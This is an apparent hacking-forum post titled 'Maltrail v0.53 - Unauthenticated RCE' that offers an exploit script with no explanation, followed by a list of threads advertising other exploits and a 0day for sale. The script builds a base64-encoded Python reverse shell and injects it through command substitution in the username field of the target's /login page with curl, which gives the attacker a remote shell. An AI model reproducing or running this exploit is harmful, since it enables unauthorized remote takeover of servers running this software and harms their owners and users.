Maltrail v0.53 - Unauthenticated RCE
by luszxis - Friday January 26, 2024 at 08:59 PM
#1
Maltrail v0.53 - Unauthenticated RCE

Fuck YOU..!


- ! No info available ! -
Exploit:
import sys; import os; import base64; def main(): listening_IP = None listening_PORT = None target_URL = None if len(sys.argv) != 4: print("Error. Needs listening IP, PORT and target URL.") return(-1) listening_IP = sys.argv[1] listening_PORT = sys.argv[2] target_URL = sys.argv[3] + "/login" print("Running exploit on " + str(target_URL)) curl_cmd(listening_IP, listening_PORT, target_URL) def curl_cmd(my_ip, my_port, target_url): payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'' encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64 command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'" os.system(command) if __name__ == "__main__":   main()
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Sell] Calix GPON - Preauth RCE 0day ericki 1 288 06-29-2026, 06:41 AM
Last Post: johnmalkovich1202
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 78 02-07-2026, 03:32 PM
Last Post: cysc
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 265 02-06-2026, 07:08 PM
Last Post: hacker0123
  WordPress LFI to RCE - CVE-2025-0366 Serious 1 462 02-05-2026, 09:53 AM
Last Post: Sammm89
  Dokan Pro Unauthenticated SQL Injection POC | CVSS 10 Loki 40 3,414 01-30-2026, 11:13 PM
Last Post: probe7878



 Users browsing this thread: 1 Guest(s)